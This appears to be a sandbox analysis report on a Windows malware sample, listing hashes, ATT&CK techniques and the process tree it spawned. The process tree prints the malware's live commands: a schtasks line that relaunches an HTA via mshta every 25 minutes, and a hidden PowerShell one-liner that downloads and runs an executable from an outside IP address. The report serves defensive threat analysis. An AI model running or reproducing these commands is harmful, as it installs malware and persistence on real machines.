Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250211-en -
resource tags
arch:x64arch:x86image:win10v2004-20250211-enlocale:en-usos:windows10-2004-x64system -
submitted
15-02-2025 17:02
Static task
static1
Behavioral task
behavioral1
Sample
5QZQM_random.exe
Resource
win7-20241010-en
General
-
Target
5QZQM_random.exe
-
Size
938KB
-
MD5
2a652936c15591f45c63a9c6c01ed212
-
SHA1
5dad7de67525e4b6f3ed8e5d6f4257943eac7c62
-
SHA256
1723bd9dd8938f0a1d3cd89fe50a54f8538d4961c2a15d385e94f0e0f36d9be7
-
SHA512
64981162e2202c9ed051f5e9a8a04f5760c382fd42a77be3625f6194419f0ee596fb86b68d8a7f8c57b9aa9a4c4dbc90aee1cc69884d45cd572958e2e0b9517f
-
SSDEEP
24576:+qDEvCTbMWu7rQYlBQcBiT6rprG8ay0F:+TvC/MTQYxsWR7ay0
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 3852 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3852 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 34 364 Process not Found 7 3852 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3296967594-3563063956-581523229-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5QZQM_random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3572 MicrosoftEdgeUpdate.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4148 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3852 powershell.exe 3852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3852 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1452 5QZQM_random.exe 1452 5QZQM_random.exe 1452 5QZQM_random.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1452 5QZQM_random.exe 1452 5QZQM_random.exe 1452 5QZQM_random.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1452 wrote to memory of 1920 1452 5QZQM_random.exe 89 PID 1452 wrote to memory of 1920 1452 5QZQM_random.exe 89 PID 1452 wrote to memory of 1920 1452 5QZQM_random.exe 89 PID 1452 wrote to memory of 4480 1452 5QZQM_random.exe 90 PID 1452 wrote to memory of 4480 1452 5QZQM_random.exe 90 PID 1452 wrote to memory of 4480 1452 5QZQM_random.exe 90 PID 1920 wrote to memory of 4148 1920 cmd.exe 92 PID 1920 wrote to memory of 4148 1920 cmd.exe 92 PID 1920 wrote to memory of 4148 1920 cmd.exe 92 PID 4480 wrote to memory of 3852 4480 mshta.exe 94 PID 4480 wrote to memory of 3852 4480 mshta.exe 94 PID 4480 wrote to memory of 3852 4480 mshta.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\5QZQM_random.exe"C:\Users\Admin\AppData\Local\Temp\5QZQM_random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn NpghkmaxE8b /tr "mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn NpghkmaxE8b /tr "mshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4148
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\oIbPWwHMT.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NP58OLGZLAWMPQPZF7DRJWUCDZM8RVXA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NzEwRTg2NjUtQUQ0RS00MUQ5LThCMDItRTdERjExNEE3NkJFfSIgdXNlcmlkPSJ7QUI4NzU4NEQtQTRBOS00QkY3LTg3NzYtQ0ZGMjVCM0Y2MkMyfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RTk5MDMwNjgtNzQ5Mi00OTc5LTk1NjAtNDE5NDA4QkQ1QUJEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3MzkyODIxNjkiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4Mzc1MzE4NTEwMTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1Mjc3Mjk4NzI2Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3572
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
720B
MD5c6910aed9f6537768f85e6410cbbd8ee
SHA19ac3ba2b01f0e19f9718f74108a5fb0f52691e3b
SHA2561e2daf6bca2110c968aae773c7b92a10d7122fd2fa07edb5054d35226e873571
SHA512af3a7732969935749fee625794944be4164436c4802dd82f05e664c0f8bf588245c5cceb38a5c3e176508bbc3772a13f5e2d46db9b583fb4c3e2f8f0d8c6d9ec